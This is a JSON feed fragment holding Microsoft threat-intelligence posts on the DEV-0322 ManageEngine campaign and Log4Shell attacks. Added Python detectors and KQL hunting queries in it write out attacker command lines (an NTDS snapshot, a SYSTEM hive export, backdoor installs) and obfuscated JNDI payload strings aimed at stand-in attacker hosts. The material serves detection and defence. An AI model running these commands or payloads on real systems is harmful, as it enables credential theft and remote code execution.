", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2021-11-09T18:22:59", "description": "Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) in a targeted campaign. 
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.\n\nMSTIC previously highlighted DEV-0322 activity related to [attacks targeting the SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.\n\nOur colleagues at Palo Alto Unit 42 have also highlighted this activity in [their recent blog](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>). We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in [Black Lotus Labs](<https://www.lumen.com/en-us/security/black-lotus-labs.html>) at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.\n\nThis blog shares what Microsoft has observed in the latest DEV-0322 campaign and informs our customers of protections in place through our security products. We have not observed any exploit of Microsoft products in this activity.\n\nMSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. 
Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## Activity description\n\nMSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.\n\n### Credential dumping\n\nIn this campaign, DEV-0322 was observed performing credential dumping using the following commands:\n\n\n\nDEV-0322 also occasionally deployed a tool to specifically read security event logs and look for Event ID 4624 events. Next, their tool would collect domains, usernames, and IP addresses and write them to the file _elrs.txt_. They typically called this tool _elrs.exe_, and below is an example of how they would call it:\n\n\n\nAfter gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:\n\n\n\n### Installing custom IIS module\n\nThe _gac.exe_ binary installs _ScriptModule.dll_ into the Global Assembly Cache before using _AppCmd.exe_ to install it as an IIS module. _AppCmd.exe_ is a command line tool included in IIS 7+ installations used for server management. This module hooks into the BeginRequest IIS HTTP event and looks for custom commands and arguments being passed via the Cookie header of the HTTP request.\n\n\n\n_Figure 1: Encoded request from the controller to the victim machine_\n\nThe custom IIS module supports execution of _cmd.exe_ and PowerShell commands. It also provides DEV-0322 with the ability to direct download and upload of files to and from a compromised IIS web server. 
The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:\n\n_C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat_\n\nIf this module receives the command \u201cccc,\u201d it drops a file _c:\\windows\\temp\\ccc.exe_. The file _ccc.exe_ is a .NET program that launches _cmd.exe_ with an argument and sends any output back to the controller.\n\n\n\n_Figure 2: The Base64-encoded ccc.exe contained inside the IIS module backdoor_\n\nBelow is an example command from the _w3wp.exe_ process after _ccc.exe_ is dropped:\n\n`\"c:\\windows\\temp\\ccc.exe\" dir`\n\n### Deploying Zebracon malware\n\nIn addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.\n\nSubsequent commands are made to _<ZimbraServer>/service/soap_ using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:\n\n * Search email (e.g., _<query>(in:\\"inbox\\" or in:\\"junk\\") is:unread</query>_)\n * Read email\n * Send email (e.g., _Subject: [AutoReply] I've received your mail, I will check it soon!_)\n\nThese operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.\n\nFiles related to the Zebracon Trojan have the following metadata:\n\n * Company name:\n   * Synacor. Inc.\n * File description:\n   * Zimbra Soap Suites\n   * Zimbra Soap Tools\n * Internal name:\n   * newZimbr.dll\n   * zimbra-controller-dll.dll\n * Original filename:\n   * newZimbr.dll\n   * ZIMBRA-SOAP.DLL\n\nMicrosoft will continue to monitor DEV-0322 activity and implement protections for our customers. 
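To make the post-exploitation indicators described in this section usable outside the Microsoft 365 Defender portal, here is an added Python example (not Microsoft's code) that mirrors the matching logic of the post's advanced hunting queries over raw process and file events and scores each host; the host names, the event shape and the helper names (`process_event_matches`, `file_event_matches`, `score_hosts`) are assumptions, and all events are constructed.

```python
"""Score hosts for the DEV-0322 post-exploitation tradecraft described above.

Added example, not Microsoft's code: it re-implements the matching logic of the
post's advanced hunting queries in plain Python for teams that only have raw
process/file telemetry (for example exported as JSON lines).  Host names and
events below are constructed; the command-line and file indicators are the ones
the post reports.
"""
import json
import re
from collections import defaultdict

# Command-line fragments the post lists as observed DEV-0322 activity (lower-case).
CMD_FRAGMENTS = [
    'ntdsutil snapshot "activate instance ntds" create quit quit',  # AD database snapshot
    r"regsvr32 /s c:\windows\temp\user64.dll",
    r"gac.exe -i c:\windows\temp\scriptmodule.dll",                 # IIS backdoor install
    "cmd /c elrs.exe",                                               # 4624 logon harvester
    r"c:\windows\temp\ccc.exe",                                      # dropped by the "ccc" command
]
# SYSTEM hive export with an actor-chosen prefix; a regex, as in the post's query.
HIVE_SAVE_RE = re.compile(r"save hklm\\system [^ ]*_system\.hiv")

# Full paths and file names of artefacts the IIS module and tooling drop (lower-case).
DROPPED_PATHS = [
    r"c:\programdata\microsoft\crypto\rsa\key.dat",  # captured credentials
    r"c:\windows\temp\ccc.exe",
]
DROPPED_NAMES = ["elrs.exe", "scriptmodule.dll", "gac.exe", "user64.dll"]


def process_event_matches(cmdline):
    """Return the indicators a process command line matches (case-insensitive)."""
    # WMI-relayed commands carry escaped quotes (\"); drop the escapes before matching.
    lowered = cmdline.lower().replace('\\"', '"')
    hits = [frag for frag in CMD_FRAGMENTS if frag in lowered]
    if HIVE_SAVE_RE.search(lowered):
        hits.append("reg save HKLM\\SYSTEM *_System.HIV")
    return hits


def file_event_matches(path, name):
    """Return the dropped-file indicators a file-creation event matches."""
    full = path.lower().rstrip()  # tolerate trailing whitespace from log exports
    hits = [p for p in DROPPED_PATHS if full.endswith(p)]
    if name.lower() in DROPPED_NAMES:
        hits.append(name.lower())
    return hits


def score_hosts(events):
    """Aggregate per host. The risk score is the number of distinct indicators seen on
    the host, a slight variation on the post's query, which counts matching events."""
    seen = defaultdict(set)
    for ev in events:
        if ev["type"] == "process":
            seen[ev["host"]].update(process_event_matches(ev["cmdline"]))
        elif ev["type"] == "file":
            seen[ev["host"]].update(file_event_matches(ev["path"], ev["name"]))
    return {
        host: {"risk_score": len(inds), "indicators": sorted(inds)}
        for host, inds in seen.items()
        if inds
    }


# Constructed telemetry for a demonstration run (not real data).
SAMPLE_EVENTS = [
    {"type": "process", "host": "ADSS-WEB01",
     "cmdline": r'cmd.exe /c "wmic /node:10.0.0.5 process call create "ntdsutil snapshot '
                r'\"activate instance ntds\" create quit quit > c:\windows\temp\nt.dat"'},
    {"type": "process", "host": "ADSS-WEB01",
     "cmdline": r"reg save HKLM\SYSTEM c:\windows\temp\7f3a_System.HIV"},
    {"type": "file", "host": "ADSS-WEB01",
     "path": r"C:\ProgramData\Microsoft\Crypto\RSA\key.dat", "name": "key.dat"},
    {"type": "process", "host": "FS02",
     "cmdline": r'process call create "cmd /c c:\windows\temp\gac.exe -i '
                r'c:\windows\temp\ScriptModule.dll >c:\windows\temp\tmp.dat"'},
    {"type": "process", "host": "FS02", "cmdline": "cmd /c elrs.exe"},
    {"type": "file", "host": "FS02", "path": r"C:\Windows\Temp\elrs.exe", "name": "elrs.exe"},
    # Ordinary administration on a workstation: must not score.
    {"type": "process", "host": "WS-HR-17",
     "cmdline": r"reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\W32Time"},
    {"type": "process", "host": "WS-HR-17",
     "cmdline": r'regsvr32 /s "c:\program files\vendor\plugin.dll"'},
]


if __name__ == "__main__":
    ranked = sorted(score_hosts(SAMPLE_EVENTS).items(), key=lambda kv: -kv[1]["risk_score"])
    for host, result in ranked:
        print(json.dumps({"host": host, **result}))
```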
The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Detections\n\n### Microsoft 365 Defender detections\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Trojan:MSIL/Gacker.A!dha\n * Backdoor:MSIL/Kokishell.A!dha\n * Trojan:Win64/Zebracon.A!dha\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * DEV-0322 Actor activity detected\n * Malware from possible exploitation of CVE-2021-40539\n\nThe following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:\n\n * 'Zebracon' high-severity malware was detected\n * Anomaly detected in ASEP registry\n\nMicrosoft 365 Defender correlates any related alerts into [incidents](<https://docs.microsoft.com/microsoft-365/security/defender/investigate-incidents?view=o365-worldwide>) to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.\n\nThe threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. 
Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.\n\n### Microsoft Sentinel detections\n\nThe indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the _Microsoft Emerging Threat Feed_ located in the [Microsoft Sentinel Threat Intelligence blade](<https://docs.microsoft.com/azure/sentinel/understand-threat-intelligence>). These can be used by customers for detection purposes alongside the hunting queries detailed below.\n\n## Advanced hunting queries\n\n### Microsoft Sentinel hunting queries\n\n**Name**: DEV-0322 Command Line Activity November 2021 \n**Description**: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor's post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml>\n\n**Name**: DEV-0322 File Drop Activity November 2021 \n**Description**: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor\u2019s post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. 
Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml>\n\nIn addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:\n\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021-MSIM.yaml>\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021-MSIM.yaml>\n\n### Microsoft 365 Defender hunting queries\n\n**Name:** Surface devices with the CVE-2021-40539 vulnerability \n**Description:** Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA2WQuw6CQBBFT23iP2yoNb4LCyqwsFETjT3iEjQgBlAaP967FkqwmJ27N7NnZjbE8uRCrHyQytlTkFDTEFHKPfIg4yZVyjmpNlPUCkuFoU-PFyPTkH5qrHQgkmXNWdrH1-kRiLRiyJSxYiI1l1owY4n35RjuYhRc9T5WF0PYmtARBx1vo6lyZef_-rrbVrvsNG0kTiJmqTrndzdsE_63dztV6lXoD949nbyNLgEAAA&timeRangeId=week>).\n\n`DeviceTvmSoftwareVulnerabilities \n| where CveId == \"CVE-2021-40539\" \n| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion`\n\n**Name:** Hunt for suspicious dropped files post-exploitation \n**Description:** Look for suspicious files dropped by the threat actor\u2019s post-exploitation activity. 
[Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA41T20rDQBCdZ8F_WPrUQmzelT6U1EKhSlHfVKSm6T1JyUZrwI_3zMmGJlGhLNmZneuZS3zxxchUUpwduCVoBprLWiJQKwfQUDbQbEAN6R4yC34B2xQWarPA-10K55tBMgdncIegGvVSLvAuj0bIW9EGjFhIAp-Y2bryLB0J5FpecGbMtsKt-hHjz6m5o7VqLb4l5CoNICmATbPr-0EeZUhuh4yF9JGtxNgRj3foMh0RL4E2BWcpyeERI5byIU8fki98HXmVntw0qhtB_klMkYxdhbeQRIiaI2Ld9hvfkd3O2PHK_p5VqiQiFktU2ltFGsEmg-yEwrjJjUH3sNd4M9anHmtwVt5wJ5xRt9b5XgOPz42YwC50U7REUW1EBj_LXbGwSB1q7brhO8aZE3E5-5A5LDu6qk1ctXvOyzCDVtnuyxZa9TPIV05kQN8lZ_rBqWSspt7xck-qvOf2vekVNCqZMnvkKky4dyqxbmtiVuvz__g9mR77k7T2YgKfNp4DMWz5x-VyRWTa4YWr8wm-MRHm3I4D97Yetdoa749N8v7ZDu_M6j23F7qFG_qWM236DjlznY72qcr9A2VPOedoBAAA&timeRangeId=week>).\n\n`// Look for the specific files dropped by threat actor \nlet files = dynamic([\"C:\\\\ProgramData\\\\Microsoft\\\\Crypto\\\\RSA\\\\key.dat\", \"c:\\\\windows\\\\temp\\\\ccc.exe\"]); \nDeviceFileEvents \n| where FileName endswith \"elrs.exe\" or FolderPath has_any (files) \n// Increase the risk score of command accessing file also seen \n| join kind=leftouter (DeviceProcessEvents \n| where ProcessCommandLine contains \"cmd /c elrs.exe\") on DeviceId \n| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName`\n\n**Name:** Hunt for command lines observed used by the DEV-0322 actor \n**Description:** Look for suspicious command lines that are used as part of the threat actor's post-exploitation activity. 
[Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA71W72_SUBS9n038H8i-wAyDRM0-zGCic8uIsJixmJg5CbQd1NGCtMBm_OM997xXaaHFitE09N333v31zj33laY0pSIdmeK5h3SHcY7RwRjgGUgoLuYT8SF5EkGeyhCjB70l3rq74FyloTziHcsYczPOIQ0gVfB2MKr_p_IEc_NMsB8zYgAP_UykFn4uPIawDbDuSE1upGp1G9B6YJwmVipyICurpSshIrnYPWEGro1uspxhbYq5RokYe4C4E0pJvh49hpBc6Cww-tSImM0M4xg-NPPPeA6sfx-YJNZ6jgiyYuhwJfFmLDajfUMUnx7X0mtqndBiRY8uoq6sD7ULkIvK6rvBc8bw_Qoo1WFbZYQR9JeQXshzYhOV9rqwlT6Wl_SuKCWei1HcxtFULKlUudgjYrqu8hG0i23Tlj3G9zGLpUseLMiz5ASKa7kcYkprXKtyK4dAN83gd9BfkneefMhgcsYO0cpEGYtmQdcZtsSWwwlm6Y5I-jHbFdqTITHSeqn2CLKpvKKXjv0DvxX7c06LbManmb7v2MgV6A-w2-e6dngtp18Pmce8tM-AZ3WYS5TJVxkTYXdJvQt5D6uurewn_K6BbBc7N_IF71t5hjx6yCuytWvApi0f2WMmozZi-kTW4KsI_YuT7x_n_-CxyQS92Uw22i_f6V_v_gVZW8PJtNfPsTentx40lNEtMi-ExjXGgBnH5OPM2nSI29rC3OYa6aHAKvl6pPupDYzqG2uXtPC4XgZb1XsDnfW50h7Oea9nve5bxXK2-0UsPsGf2vag4-bcR29ZMY_M8yHdkx8Ome3ZO0a_YcqYIe8PXbv7zb-F6Ff9k1vO470-Zm9NyYBNVirnY1qptyubTS-VSyvD0_6WB_Nt-gpd_Sof0UptXZt3HqfzWFvPjb-LkXns_TuW7kYn3uokg07--bIRTvm9iJnPGVeUR4_WQzHjLmzddtvnIfQTp42GkHAKAAA&timeRangeId=week>).\n\n`// Look for command lines observed used by the threat actor \nlet cmd_lines = dynamic(['cmd.exe /c \"wmic /node:redacted process call create \"ntdsutil snapshot \\\\\"activate instance ntds\\\\\" create quit quit > c:\\\\windows\\\\temp\\\\nt.dat\";', 'regsvr32 /s c:\\\\windows\\\\temp\\\\user64.dll', 'process call create \"cmd /c c:\\\\windows\\\\temp\\\\gac.exe -i c:\\\\windows\\\\temp\\\\ScriptModule.dll >c:\\\\windows\\\\temp\\\\tmp.dat\"']); \nDeviceProcessEvents \n// Look for static cmd lines and dynamic one using regex \n| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" \n| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, 
ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid \n// Base risk score on number of command lines seen for each host \n| extend RiskScore = count_ \n| project-reorder FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName \n| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName`\n\n## Indicators of compromise (IOCs)\n\nThe post [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": 
{}, "published": "2021-11-09T00:24:55", "type": "mmpc", "title": "Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:24:55", "id": "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "href": "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T21:30:14", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. 
At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) have presented a new attack vector and gained broad attention due to their severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. 
It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n    * Threat and vulnerability management\n    * Discovering affected components, software, and devices via a unified Log4j dashboard\n    * Applying mitigation directly in the Microsoft 365 Defender portal\n    * Microsoft 365 Defender advanced hunting\n    * Microsoft Defender for Cloud\n    * Microsoft Defender for servers\n    * Microsoft Defender for Containers\n    * Microsoft Sentinel queries\n    * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n    * Microsoft 365 Defender\n    * Microsoft Defender Antivirus\n    * Microsoft Defender for Endpoint\n    * Microsoft Defender for Cloud Apps\n    * Microsoft Defender for Office 365\n    * Microsoft 365 Defender advanced hunting\n    * Microsoft Defender for Cloud\n    * Microsoft Defender for IoT\n    * Microsoft Sentinel\n    * Microsoft Sentinel queries\n    * Azure Firewall Premium\n    * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, has been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers. 
An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. 
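As an added example (not from the Microsoft post), the following Python detector applies the request-string structure just described (jndi, then the protocol, then the callback host) to constructed web request log lines. It first resolves the nested lower/upper lookups the post mentions and, generalizing slightly, the `${x:-default}` default-value form and URL encoding, and it flags the testing services the post discusses later (interact.sh, canarytokens.org, dnslog.cn, Burp Collaborator); log lines, hostnames and the helper names are assumptions.

```python
"""Flag Log4Shell-style JNDI lookups in web request logs, including obfuscated forms.

Added example, not from the Microsoft post.  Before matching it undoes the
nested ${...} tricks the post describes (lower/upper lookups) plus the
"${x:-default}" default-value form from the same family of evasions, and
URL-decodes the line.  Log lines and hostnames below are constructed.
"""
import re
from urllib.parse import unquote

PROTOCOLS = ("ldap", "ldaps", "rmi", "dns", "iiop", "http")
# A lookup whose body contains no further "${"; resolved repeatedly, innermost first.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Resolved shape: jndi:<protocol>://<callback host>
JNDI_RE = re.compile(r"jndi:(%s)://([a-z0-9._-]+)" % "|".join(PROTOCOLS), re.IGNORECASE)
# Services the post says organisations use to profile their own footprint; the post
# still asks that hits on them be validated as intentional activity.
TESTING_SERVICES = ("interact.sh", "canarytokens.org", "dnslog.cn", "burpcollaborator.net")


def _resolve(body):
    """Evaluate one non-nested lookup body the way a Log4j 2 pattern layout would."""
    if ":-" in body:                       # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return "${" + body + "}"                # not an obfuscation lookup: keep literally


def normalize(text, max_rounds=16):
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def detect(log_line):
    """Return a finding for a line that carries a JNDI lookup, else None."""
    decoded = unquote(log_line)
    normalized = normalize(decoded)
    m = JNDI_RE.search(normalized)
    if not m:
        return None
    protocol, host = m.group(1).lower(), m.group(2).lower()
    return {
        "protocol": protocol,
        "host": host,
        "obfuscated": normalized != decoded,
        "testing_service": any(host == s or host.endswith("." + s) for s in TESTING_SERVICES),
    }


def scan(lines):
    """Return (line number, finding) pairs for every line that triggers."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = detect(line)
        if finding:
            findings.append((number, finding))
    return findings


# Constructed access-log lines (documentation-range IPs, .example hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://scan.attacker.example/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}${lower:d}i:${lower:rmi}://cb.attacker.example:1099/x}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:20 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://abc123.interact.sh/z}"',
    '203.0.113.10 - - [10/Dec/2021:14:02:31 +0000] "GET /?q=%24%7B%24%7Benv%3ANaN%3A-j%7D'
    'ndi%3Adns%3A%2F%2Fprobe.dnslog.cn%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:14:03:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',
]


if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```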
Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise 